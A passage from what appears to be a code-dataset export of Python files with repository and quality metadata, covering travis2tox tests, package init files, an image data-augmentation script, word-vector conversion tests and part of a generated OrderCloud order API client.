tox_config = travis2tox(six.StringIO(travis))
self.assertEqual(tox_config.commands, ['echo 1', 'echo 2'])
def test_after_script(self):
travis = '''
language: python
python:
- 2.7
script:
- echo 1
- echo 2
'''
tox_config = travis2tox(six.StringIO(travis))
self.assertEqual(tox_config.commands, ['echo 1', 'echo 2'])
| 19.244186
| 67
| 0.608459
| 200
| 1,655
| 4.91
| 0.14
| 0.0611
| 0.10998
| 0.1222
| 0.870672
| 0.870672
| 0.870672
| 0.870672
| 0.700611
| 0.700611
| 0
| 0.036007
| 0.261631
| 1,655
| 85
| 68
| 19.470588
| 0.767594
| 0
| 0
| 0.8
| 0
| 0
| 0.318429
| 0
| 0
| 0
| 0
| 0
| 0.085714
| 1
| 0.085714
| false
| 0
| 0.042857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6d3728f7084b91f4787a0a0f6080c042eee6e361
| 162
|
py
|
Python
|
soccerpy/__init__.py
|
SlapBot/soccerpy
|
e70cd9bf2ad130f004d85328a83deba0815461bd
|
[
"MIT"
] | null | null | null |
soccerpy/__init__.py
|
SlapBot/soccerpy
|
e70cd9bf2ad130f004d85328a83deba0815461bd
|
[
"MIT"
] | 1
|
2017-07-18T17:04:58.000Z
|
2017-07-19T02:02:46.000Z
|
soccerpy/__init__.py
|
SlapBot/soccerpy
|
e70cd9bf2ad130f004d85328a83deba0815461bd
|
[
"MIT"
] | 1
|
2018-08-17T23:51:31.000Z
|
2018-08-17T23:51:31.000Z
|
from soccerpy.modules.Competition.competition import Competition
from soccerpy.modules.Fixture.fixture import Fixture
from soccerpy.modules.Team.team import Team
| 40.5
| 64
| 0.87037
| 21
| 162
| 6.714286
| 0.333333
| 0.255319
| 0.404255
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 162
| 3
| 65
| 54
| 0.94
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
edb2b0596e1e1cb8ecb027a8f8a50b7e041d19d4
| 130
|
py
|
Python
|
blogstrap/__init__.py
|
joehakimrahme/blogstrap
|
6ff91904065d01ebaf757a51c1483c7f180521c0
|
[
"Apache-2.0"
] | null | null | null |
blogstrap/__init__.py
|
joehakimrahme/blogstrap
|
6ff91904065d01ebaf757a51c1483c7f180521c0
|
[
"Apache-2.0"
] | 13
|
2015-11-16T12:21:50.000Z
|
2020-05-28T08:25:27.000Z
|
blogstrap/__init__.py
|
joehakimrahme/blogstrap
|
6ff91904065d01ebaf757a51c1483c7f180521c0
|
[
"Apache-2.0"
] | 2
|
2015-11-22T09:39:53.000Z
|
2020-11-24T10:35:19.000Z
|
import six
if six.PY2:
from blogstrap import create_app # noqa
else:
from blogstrap.blogstrap import create_app # noqa
| 18.571429
| 54
| 0.738462
| 19
| 130
| 4.947368
| 0.526316
| 0.276596
| 0.446809
| 0.510638
| 0.595745
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009804
| 0.215385
| 130
| 6
| 55
| 21.666667
| 0.911765
| 0.069231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
edb99ecc54cb284ed550aebdcbbd6b1175a52d3d
| 2,269
|
py
|
Python
|
scripts/data_argumentation.py
|
JinshuChen/SteelDetection
|
ce8bf4d859591f4d9df30b41bdd69c3331688e8c
|
[
"MIT"
] | 4
|
2019-03-29T09:30:13.000Z
|
2020-05-07T12:42:16.000Z
|
scripts/data_argumentation.py
|
JinshuChen/SteelDetection
|
ce8bf4d859591f4d9df30b41bdd69c3331688e8c
|
[
"MIT"
] | 1
|
2019-10-29T11:18:14.000Z
|
2019-10-29T11:18:14.000Z
|
scripts/data_argumentation.py
|
JinshuChen/SteelDetection
|
ce8bf4d859591f4d9df30b41bdd69c3331688e8c
|
[
"MIT"
] | null | null | null |
import os
from impy.ObjectDetectionDataset import *
# def main():
# # Define the path to images and annotations
# images_path = "/home/c/workspace/tf_models/research/SteelDetection/impy_train_data/circle_steel/img"
# annotations_path = "/home/c/workspace/tf_models/research/SteelDetection/impy_train_data/circle_steel/annotations"
# # Define the name of the dataset
# dbName = "circle_steel"
# # Create an object of ImageLocalizationDataset
# imda = ObjectDetectionDataset(imagesDirectory = images_path, annotationsDirectory = annotations_path, databaseName = dbName)
# # Reduce the dataset to smaller Rois of smaller ROIs of shape 1032x1032.
# images_output_path = "/home/c/workspace/tf_models/research/SteelDetection/impy_train_data/circle_steel/img_adapted"
# annotations_output_path = "/home/c/workspace/tf_models/research/SteelDetection/impy_train_data/circle_steel/annotations_adapted"
# imda.reduceDatasetByRois(offset = [640, 640], outputImageDirectory = images_output_path, outputAnnotationDirectory = annotations_output_path)
# if __name__ == "__main__":
# main()
def main():
# Define the path to images and annotations
images_path = "/home/c/workspace/tf_models/research/SteelDetection/impy_train_data/NHsquare_steel/img_adapted"
annotations_path = "/home/c/workspace/tf_models/research/SteelDetection/impy_train_data/NHsquare_steel/annotations_adapted"
# Define the name of the dataset
dbName = "NHsquare_steel"
# Create an object of ImageLocalizationDataset
imda = ObjectDetectionDataset(imagesDirectory = images_path, annotationsDirectory = annotations_path, databaseName = dbName)
# Apply data augmentation by using the following method of the ImageLocalizationDataset class.
configuration_file = "/home/c/workspace/tf_models/research/SteelDetection/impy_train_data/config2.json"
images_output_path = "/home/c/workspace/tf_models/research/SteelDetection/impy_train_data/NHsquare_steel/img_adapted"
annotations_output_path = "/home/c/workspace/tf_models/research/SteelDetection/impy_train_data/NHsquare_steel/annotations_adapted"
imda.applyDataAugmentation(configurationFile = configuration_file, outputImageDirectory = images_output_path, outputAnnotationDirectory = annotations_output_path)
if __name__ == "__main__":
main()
| 64.828571
| 163
| 0.824152
| 274
| 2,269
| 6.514599
| 0.237226
| 0.02521
| 0.070588
| 0.080672
| 0.817927
| 0.817927
| 0.817927
| 0.783193
| 0.783193
| 0.783193
| 0
| 0.007264
| 0.089907
| 2,269
| 35
| 164
| 64.828571
| 0.857143
| 0.534156
| 0
| 0
| 0
| 0
| 0.477295
| 0.456039
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.153846
| 0
| 0.230769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b6a4e1060401e8fa16df2b9458777ae26a4cfd86
| 7,685
|
py
|
Python
|
tests/test_convert.py
|
blester125/word-vectors
|
4f6d8b2b6d8b87fad453a37000c6d0d236a6cb96
|
[
"MIT"
] | 1
|
2018-07-06T08:37:34.000Z
|
2018-07-06T08:37:34.000Z
|
tests/test_convert.py
|
blester125/word-vectors
|
4f6d8b2b6d8b87fad453a37000c6d0d236a6cb96
|
[
"MIT"
] | 5
|
2020-04-24T13:21:10.000Z
|
2020-06-23T19:45:51.000Z
|
tests/test_convert.py
|
blester125/word_vectors
|
4f6d8b2b6d8b87fad453a37000c6d0d236a6cb96
|
[
"MIT"
] | null | null | null |
import os
import random
import pathlib
from unittest.mock import patch
import numpy as np
from word_vectors import FileType
from word_vectors.read import read
from word_vectors.convert import convert
from utils import vocab, vectors, DATA, GLOVE, W2V, W2V_TEXT, LEADER, rand_str
INPUT_MAPPING = {
GLOVE: FileType.GLOVE,
W2V: FileType.W2V,
W2V_TEXT: FileType.W2V_TEXT,
LEADER: FileType.LEADER,
}
def test_convert():
data = random.choice([GLOVE, W2V, W2V_TEXT, LEADER])
output_type = random.choice(list(FileType))
input_path = str(DATA / data)
gold_output_path = os.path.splitext(input_path)[0] + "." + str(output_type)
with patch("word_vectors.convert_module.write") as write_patch:
w, wv = read(input_path)
convert(input_path, output_file_type=output_type)
call_file, call_w, call_wv, call_type = write_patch.call_args_list[0][0]
assert call_file == gold_output_path
assert call_w == w
np.testing.assert_allclose(call_wv, wv)
assert call_type is output_type
def test_convert_with_output():
data = random.choice([GLOVE, W2V, W2V_TEXT, LEADER])
output_type = random.choice(list(FileType))
output = rand_str()
input_path = str(DATA / data)
with patch("word_vectors.convert_module.write") as write_patch:
w, wv = read(input_path)
convert(input_path, output, output_file_type=output_type)
call_file, call_w, call_wv, call_type = write_patch.call_args_list[0][0]
assert call_file == output
assert call_w == w
assert call_type == output_type
np.testing.assert_allclose(call_wv, wv)
def test_convert_with_input():
data = random.choice([GLOVE, W2V, W2V_TEXT, LEADER])
input_type = INPUT_MAPPING[data]
output_type = random.choice(list(FileType))
input_path = str(DATA / data)
output = rand_str()
with patch("word_vectors.convert_module.read") as read_patch:
with patch("word_vectors.convert_module.write") as write_patch:
w, wv = read(input_path)
read_patch.return_value = (w, wv)
convert(input_path, output, output_file_type=output_type, input_file_type=input_type)
read_patch.assert_called_once_with(input_path, input_type)
call_file, call_w, call_wv, call_type = write_patch.call_args_list[0][0]
assert call_file == output
assert call_w == w
assert call_type == output_type
np.testing.assert_allclose(call_wv, wv)
def test_convert_pathlib():
data = random.choice([GLOVE, W2V, W2V_TEXT, LEADER])
output_type = random.choice(list(FileType))
input_path = DATA / data
gold_output_path = os.path.splitext(str(input_path))[0] + "." + str(output_type)
with patch("word_vectors.convert_module.write") as write_patch:
w, wv = read(input_path)
convert(input_path, output_file_type=output_type)
call_file, call_w, call_wv, call_type = write_patch.call_args_list[0][0]
assert str(call_file) == gold_output_path
assert call_w == w
np.testing.assert_allclose(call_wv, wv)
assert call_type is output_type
def test_convert_with_output_pathlib():
data = random.choice([GLOVE, W2V, W2V_TEXT, LEADER])
output_type = random.choice(list(FileType))
output = pathlib.Path(rand_str())
input_path = DATA / data
with patch("word_vectors.convert_module.write") as write_patch:
w, wv = read(input_path)
convert(input_path, output, output_file_type=output_type)
call_file, call_w, call_wv, call_type = write_patch.call_args_list[0][0]
assert call_file == output
assert call_w == w
assert call_type == output_type
np.testing.assert_allclose(call_wv, wv)
def test_convert_with_input_pathlib():
data = random.choice([GLOVE, W2V, W2V_TEXT, LEADER])
input_type = INPUT_MAPPING[data]
output_type = random.choice(list(FileType))
input_path = DATA / data
output = pathlib.Path(rand_str())
with patch("word_vectors.convert_module.read") as read_patch:
with patch("word_vectors.convert_module.write") as write_patch:
w, wv = read(input_path)
read_patch.return_value = (w, wv)
convert(input_path, output, output_file_type=output_type, input_file_type=input_type)
read_patch.assert_called_once_with(input_path, input_type)
call_file, call_w, call_wv, call_type = write_patch.call_args_list[0][0]
assert call_file == output
assert call_w == w
assert call_type == output_type
np.testing.assert_allclose(call_wv, wv)
def test_convert_open():
data = random.choice([GLOVE, W2V, W2V_TEXT, LEADER])
output_type = random.choice(list(FileType))
input_path = DATA / data
gold_output_path = os.path.splitext(str(input_path))[0] + "." + str(output_type)
with open(input_path, "r" if data in (GLOVE, W2V_TEXT) else "rb") as input_path:
with patch("word_vectors.convert_module.write") as write_patch:
w, wv = read(input_path)
convert(input_path, output_file_type=output_type)
call_file, call_w, call_wv, call_type = write_patch.call_args_list[0][0]
assert str(call_file) == gold_output_path
assert call_w == w
np.testing.assert_allclose(call_wv, wv)
assert call_type is output_type
def test_convert_with_output_open():
data = random.choice([GLOVE, W2V, W2V_TEXT, LEADER])
output_type = random.choice(list(FileType))
output = rand_str()
input_path = DATA / data
print(output)
try:
with open(input_path, "r" if data in (GLOVE, W2V_TEXT) else "rb") as input_path:
with open(output, "w" if output_type in (FileType.GLOVE, FileType.W2V_TEXT) else "wb") as output:
with patch("word_vectors.convert_module.write") as write_patch:
w, wv = read(input_path)
convert(input_path, output, output_file_type=output_type)
call_file, call_w, call_wv, call_type = write_patch.call_args_list[0][0]
assert call_file == output
assert call_w == w
assert call_type == output_type
np.testing.assert_allclose(call_wv, wv)
finally:
os.remove(output.name)
def test_convert_with_input_open():
data = random.choice([GLOVE, W2V, W2V_TEXT, LEADER])
input_type = INPUT_MAPPING[data]
output_type = random.choice(list(FileType))
input_path = DATA / data
output = rand_str()
print(output)
try:
with open(input_path, "r" if data in (GLOVE, W2V_TEXT) else "rb") as input_path:
with open(output, "w" if output_type in (FileType.GLOVE, FileType.W2V_TEXT) else "wb") as output:
with patch("word_vectors.convert_module.read") as read_patch:
with patch("word_vectors.convert_module.write") as write_patch:
w, wv = read(input_path)
read_patch.return_value = (w, wv)
convert(input_path, output, output_file_type=output_type, input_file_type=input_type)
read_patch.assert_called_once_with(input_path, input_type)
call_file, call_w, call_wv, call_type = write_patch.call_args_list[0][0]
assert call_file == output
assert call_w == w
assert call_type == output_type
np.testing.assert_allclose(call_wv, wv)
finally:
os.remove(output.name)
| 43.174157
| 109
| 0.660117
| 1,076
| 7,685
| 4.402416
| 0.060409
| 0.074098
| 0.044332
| 0.050665
| 0.935402
| 0.918092
| 0.913025
| 0.913025
| 0.907114
| 0.904792
| 0
| 0.008604
| 0.243852
| 7,685
| 177
| 110
| 43.418079
| 0.806574
| 0
| 0
| 0.834395
| 0
| 0
| 0.053481
| 0.051139
| 0
| 0
| 0
| 0
| 0.248408
| 1
| 0.057325
| false
| 0
| 0.057325
| 0
| 0.11465
| 0.012739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b6aa826b85b68aee168a92557d906c1fe964b4dc
| 114,702
|
py
|
Python
|
OrderCloud/apis/order_api.py
|
klreeher/python-sdk
|
b7fe922dcfc3bb73fe4149475fa45fdcb04d956a
|
[
"Apache-2.0"
] | null | null | null |
OrderCloud/apis/order_api.py
|
klreeher/python-sdk
|
b7fe922dcfc3bb73fe4149475fa45fdcb04d956a
|
[
"Apache-2.0"
] | null | null | null |
OrderCloud/apis/order_api.py
|
klreeher/python-sdk
|
b7fe922dcfc3bb73fe4149475fa45fdcb04d956a
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
OrderCloud
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 1.0
Contact: ordercloud@four51.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class OrderApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def add_promotion(self, direction, order_id, promo_code, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_promotion(direction, order_id, promo_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param str promo_code: Promo code of the promotion. (required)
:return: Promotion
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_promotion_with_http_info(direction, order_id, promo_code, **kwargs)
else:
(data) = self.add_promotion_with_http_info(direction, order_id, promo_code, **kwargs)
return data
def add_promotion_with_http_info(self, direction, order_id, promo_code, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_promotion_with_http_info(direction, order_id, promo_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param str promo_code: Promo code of the promotion. (required)
:return: Promotion
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'promo_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_promotion" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `add_promotion`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `add_promotion`")
# verify the required parameter 'promo_code' is set
if ('promo_code' not in params) or (params['promo_code'] is None):
raise ValueError("Missing the required parameter `promo_code` when calling `add_promotion`")
resource_path = '/orders/{direction}/{orderID}/promotions/{promoCode}'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
if 'promo_code' in params:
path_params['promoCode'] = params['promo_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Promotion',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def approve(self, direction, order_id, order_approval_info, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.approve(direction, order_id, order_approval_info, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param OrderApprovalInfo order_approval_info: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.approve_with_http_info(direction, order_id, order_approval_info, **kwargs)
else:
(data) = self.approve_with_http_info(direction, order_id, order_approval_info, **kwargs)
return data
def approve_with_http_info(self, direction, order_id, order_approval_info, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.approve_with_http_info(direction, order_id, order_approval_info, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param OrderApprovalInfo order_approval_info: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'order_approval_info']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method approve" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `approve`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `approve`")
# verify the required parameter 'order_approval_info' is set
if ('order_approval_info' not in params) or (params['order_approval_info'] is None):
raise ValueError("Missing the required parameter `order_approval_info` when calling `approve`")
resource_path = '/orders/{direction}/{orderID}/approve'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'order_approval_info' in params:
body_params = params['order_approval_info']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def cancel(self, direction, order_id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.cancel(direction, order_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.cancel_with_http_info(direction, order_id, **kwargs)
else:
(data) = self.cancel_with_http_info(direction, order_id, **kwargs)
return data
def cancel_with_http_info(self, direction, order_id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.cancel_with_http_info(direction, order_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method cancel" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `cancel`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `cancel`")
resource_path = '/orders/{direction}/{orderID}/cancel'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def create(self, direction, order, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create(direction, order, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param Order order: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_with_http_info(direction, order, **kwargs)
else:
(data) = self.create_with_http_info(direction, order, **kwargs)
return data
def create_with_http_info(self, direction, order, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_with_http_info(direction, order, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param Order order: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `create`")
# verify the required parameter 'order' is set
if ('order' not in params) or (params['order'] is None):
raise ValueError("Missing the required parameter `order` when calling `create`")
resource_path = '/orders/{direction}'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'order' in params:
body_params = params['order']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def decline(self, direction, order_id, order_approval_info, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.decline(direction, order_id, order_approval_info, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param OrderApprovalInfo order_approval_info: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.decline_with_http_info(direction, order_id, order_approval_info, **kwargs)
else:
(data) = self.decline_with_http_info(direction, order_id, order_approval_info, **kwargs)
return data
def decline_with_http_info(self, direction, order_id, order_approval_info, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.decline_with_http_info(direction, order_id, order_approval_info, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param OrderApprovalInfo order_approval_info: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'order_approval_info']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method decline" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `decline`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `decline`")
# verify the required parameter 'order_approval_info' is set
if ('order_approval_info' not in params) or (params['order_approval_info'] is None):
raise ValueError("Missing the required parameter `order_approval_info` when calling `decline`")
resource_path = '/orders/{direction}/{orderID}/decline'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'order_approval_info' in params:
body_params = params['order_approval_info']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
